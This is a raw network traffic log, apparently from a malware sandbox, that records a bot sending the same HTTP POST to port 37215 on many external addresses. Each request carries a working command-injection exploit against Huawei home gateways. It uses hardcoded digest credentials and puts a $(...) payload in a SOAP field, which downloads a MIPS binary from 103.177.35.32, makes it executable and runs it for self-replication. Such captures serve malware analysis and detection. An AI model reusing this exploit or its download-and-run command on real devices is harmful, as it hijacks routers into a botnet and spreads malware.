                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2282192.168.2.235862641.142.108.12337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.578625917 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2283192.168.2.2339006197.236.209.15237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.578625917 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2284192.168.2.2334124157.202.21.23137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.578658104 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2285192.168.2.234873450.121.226.7237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.578661919 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2286192.168.2.2337272157.134.171.19037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.578677893 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2287192.168.2.2339706197.164.49.15137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.578677893 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2288192.168.2.234490441.181.249.22437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.578897953 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2289192.168.2.2346222157.108.39.4137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.578897953 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2290192.168.2.2356196197.97.96.16037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.578910112 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2291192.168.2.2360942157.253.215.2437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.578931093 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
